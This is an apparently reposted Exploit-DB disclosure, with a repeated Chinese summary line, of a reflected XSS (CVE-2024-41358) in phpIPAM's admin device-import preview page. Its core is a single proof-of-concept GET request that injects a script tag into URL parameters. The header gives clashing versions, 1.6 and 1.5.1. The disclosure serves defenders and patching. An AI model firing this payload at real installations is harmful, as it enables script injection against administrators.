[webapps] phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
phpIPAM 1.6 存在反射型 XSS 漏洞,攻击者通过构造恶意 URL 参数可执行脚本代码,影响系统安全(CVE-2024-41358)。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
phpIPAM 1.6 存在反射型 XSS 漏洞,攻击者通过构造恶意 URL 参数可执行脚本代码,影响系统安全(CVE-2024-41358)。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41358
Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
文章来源: https://www.exploit-db.com/exploits/52441
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh